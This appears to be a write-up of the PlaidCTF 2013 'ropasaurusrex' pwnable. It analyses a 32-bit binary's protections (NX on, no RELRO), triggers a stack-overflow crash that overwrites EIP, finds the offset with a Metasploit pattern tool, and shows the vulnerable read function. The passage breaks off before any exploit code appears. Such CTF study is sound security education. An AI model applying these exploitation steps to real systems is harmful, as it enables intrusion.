code hacking, zen coding


PlaidCTF 2013 – Pwnable 200 – ropasaurusrex Write-up

$ file ropasaurusrex
ropasaurusrex: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.18, stripped

$ eu-readelf -l ropasaurusrex
Program Headers:
Type Offset VirtAddr PhysAddr FileSiz MemSiz Flg Align
PHDR 0x000034 0x08048034 0x08048034 0x0000e0 0x0000e0 R E 0x4
INTERP 0x000114 0x08048114 0x08048114 0x000013 0x000013 R 0x1
[Requesting program interpreter: /lib/]
LOAD 0x000000 0x08048000 0x08048000 0x00051c 0x00051c R E 0x1000
LOAD 0x00051c 0x0804951c 0x0804951c 0x00010c 0x000114 RW 0x1000
DYNAMIC 0x000530 0x08049530 0x08049530 0x0000d0 0x0000d0 RW 0x4
NOTE 0x000128 0x08048128 0x08048128 0x000044 0x000044 R 0x4
GNU_STACK 0x000000 0x00000000 0x00000000 0x000000 0x000000 RW 0x4

Section to Segment mapping:
Segment Sections...
01 [RO: .interp]
02 [RO: .interp .note.ABI-tag .hash .gnu.hash .dynsym .dynstr .gnu.version .gnu.version_r .rel.dyn .rel.plt .init .plt .text .fini .rodata .eh_frame]
03 .ctors .dtors .jcr .dynamic .got .got.plt .data .bss
04 .dynamic
05 [RO: .note.ABI-tag]

$ nc localhost 1025

This binary has a non-executable stack (NX-enabled) but has not been compiled with RELRO (read-only GOT)

Crashing it is fairly easy:

$ nc localhost 1025

Program received signal SIGSEGV, Segmentation fault.
EAX: 0x00000100 EBX: 0xB77B0FF4 ECX: 0xBFF063D0 EDX: 0x00000100 o d I t s z A P C
ESI: 0x00000000 EDI: 0x00000000 EBP: 0x65413565 ESP: 0xBFF06460 EIP: 0x37654136
CS: 0073 DS: 007B ES: 007B FS: 0000 GS: 0033 SS: 007BError while running hook_stop:
Cannot access memory at address 0x37654136
0x37654136 in ?? ()

$ /opt/metasploit-4.4.0/msf3/tools/pattern_offset.rb 0x37654136

It's crashing because of a stack overflow, buf is not big enough for the amount of data permitted to be read:

.text:080483F4 read_buffer     proc near               ; CODE XREF: handler+9p
.text:080483F4 buf             = byte ptr -88h